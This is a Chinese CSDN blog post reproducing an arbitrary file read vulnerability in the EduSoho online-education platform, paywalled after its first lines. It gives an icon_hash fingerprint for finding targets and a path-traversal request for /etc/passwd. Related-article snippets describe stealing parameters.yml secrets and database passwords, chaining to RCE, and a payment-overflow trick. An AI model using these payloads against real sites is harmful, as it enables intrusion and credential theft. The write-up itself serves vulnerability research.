【漏洞复现】EduSoho-statistics-文件读取

已于 2024-01-15 17:46:16 修改
阅读量101 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全 漏洞复现
于 2024-01-15 15:45:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44905116/article/details/135603251
版权

目录

0x01 产品简介

0x02 漏洞概述

0x03 网络测绘

0x04 漏洞复现

0x05 Nuclei

0x01 产品简介

        Edusoho 网络课堂是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统。Edusoho 提供在线教学、网校管理、云视频点播、直播、移 APP 等功能,为使教育机构能够以最低成本开展在线教学活动,EduSoho 也提供云服务器,云视频、云直播和移动 APP 定制服务,并配备相应的技术支持服务,让客户搭建自有品牌网校和搭积木一样简单。

0x02 漏洞概述

        Edusoho 网络课堂classropm-course-statistics 接口存在任意文件读取漏洞,攻击者可以通过恶意构造的请求读取服务器上的任意文件,包括敏感的系统文件。

0x03 网络测绘

icon_hash="828423215"

0x04 漏洞复现

GET /export/classropm-course-statistics?fileNames[]=../../../../../../../etc/passwd HT
了解本专栏 订阅专栏 解锁全文 超级会员免费看
.Rain.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
EduSoho教培系统 任意文件读取漏洞复现(CNVD-2023-03903)
0xSec
12-15 1140
该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE
wp-statistics
06-01
安装和使用"wp-statistics" 插件,用户需确保拥有WordPress管理权限,并具备基本的FTP或SSH文件管理技能,以将解压后的文件上传到服务器的wp-content/plugins目录下。在WordPress后台激活插件后,配置相关设置并查看...
教培系统EduSoho任意文件读取漏洞
Arched的博客
02-01 621
教培系统EduSoho任意文件读取漏洞
ngnix 漏洞修复文档
03-03
ngnix 漏洞修复文档
2024年最全教培系统EduSoho任意文件读取漏洞_edusoho历史漏洞(1),2024年最新面试总结+详细解答
最新发布
2401_84545669的博客
05-11 299
Edusoho是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统。该系统存在配置文件读取漏洞,攻击者可以通过构造恶意代码,未授权直接下载或读取parameters.yml配置文件内容,里面包含了数据库账号密码以及secret值等敏感信息。
漏洞复现EduSoho教培系统 任意文件读取漏洞复现
KKleeeaa的博客
02-01 518
任意文件读取
复现Edusoho cms任意文件读取漏洞_58
fushuang333的博客
02-25 588
复现Edusoho cms任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
EDUSOHO踩坑笔记之四十九:安全
jyl_sh的专栏
06-10 1107
安全 ◆ R1:禁止未过滤的变量拼接 SQL,请使用变量绑定替代。ORDER BY的字段、以及分页参数$start、$limit也需要过滤。防止 SQL 注入攻击。 注意 SQL 注入会导致数据库被拖库、数据被破坏、信息泄露等严重的安全问题,属于 Web 开发安全中,破坏性最大的安全问题。 继承自GeneralDaoImpl的 Dao,可以通过sql($sql, $orderBys=null, $start=null, $limit=null)来组装 OrderBy 以及分页参数。例: ...
node-red-contrib-statistics:Red Red节点,用于计算流的统计信息
05-18
节点红色统计 计算有关输入数据的统计信息。 这是“节点库的包装。 输入项 通常,将输入属性的值保存到数据集中。 input property还可以包含一个值数组,该值将保存到数据集中。 如果data set size大于0,则数据集的...
Pharo-Statistics:计算集合统计数据的方法
05-31
法罗统计 在 Pharo Smalltalk 中计算集合统计数据的方法。 Collection 和 SortedCollection 类已经实现了均值 ( average )、标准差 ( stdev ... repository: ' github://ctSkennerton/Pharo-Statistics/src ' ; load.
wow-statistics
03-09
创建一个.env文件并填充属性: REACT_APP_API_BASE_URL REACT_APP_API_ENDPOINT REACT_APP_SERVER_TITLE API后端返回的格式应为: [ { " guid " : 34 , " name " : " Lanaya " , " race " : 11 , " class ...
Fast-DDS-statistics-backend
04-08
快速DDS统计信息后端 eProsima Fast DDS统计信息后端是一个C ++库,提供对Fast DDS统计信息模块报告的统计信息测量值的收集...安装指南本教程介绍了如何使用构建和安装Fast DDS Statistics Backend ,该命令行工具是用
漏洞复现EduSoho教培系统 任意文件读取
hackzkaq的博客
02-04 533
EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。
神仙级黑客入门教程(非常详细),从零基础入门到精通,从看这篇开始
z099164的博客
02-25 1935
黑客怎么入门?这还不简单吗?
漏洞复现】CNVD-2023-08743
zkaqlaoniao的博客
10-30 194
title=”人力资源信息管理系统”
漏洞复现-EduSoho任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-27 870
漏洞复现-EduSoho任意文件读取漏洞
逻辑支付漏洞骚操作案例集合
weixin_33694172的博客
06-11 697
Edusoho逻辑支付漏洞 大概思路:假设某网校会员1年2000元,不同与以往的修改金额实现1元买会员,而是在购买会员时,先买合法的年数,例如1年,抓包,将购买的会员年限修改为很大的一个数,例如999999999999年,相应的金额999999999999*2000元。最终要付的钱数就会超出数据类型的最大值,造成数据溢出?放行数据包,会员钱数就会变为1元,年数依然为999999999999年,正...
最全EduSoho开源版安装教程2:EduSoho正确配置对性能和安全的影响
kuozhiedusoho123的博客
07-23 335
之前有许多朋友问我们,为什么EduSoho搞出那么多配置,为什么不把程序像某论坛程序一样,扔在目录下就能运作了呢? 主要的原因:EduSoho是视频应用,非文字和图片类应用 方便视频文件管理,视频文件和网站可以一个目录就备份走了 部分配置主要是为了保证服务器安全以及视频安全; 部分配置主要是为了成倍的提高服务器的处理性能和吞吐能力 例子一:配置中有个x-sendfile的配置,这个配置不是必须的。但是官方还是强烈建议配置。 X-Sendfile 是一种将文件下载请求由后端应用转交给前端 web 服务器处理
F-statistics的p值与F检验的p值的区别
05-14
F-statistics是用于比较两个或多个样本方差是否相等的统计量,它的计算方法是将样本方差的比值除以一个标准化常数,得到的结果服从F分布。 F检验是基于F-statistics的统计检验方法,用于检验两个或多个样本方差是否相等。在F检验中,我们首先计算出F-statistics值,然后根据自由度和显著性水平查找F分布表,得到F检验的p值。 因此,F-statistics的p值与F检验的p值并没有本质上的区别,它们都是根据F分布计算出来的概率值,用于判断统计结果的显著性程度。不过,需要注意的是,在不同的情况下,F-statistics和F检验所计算的p值可能略有不同,因为F-statistics和F检验所涉及的自由度和假设条件可能不同。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

.Rain.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值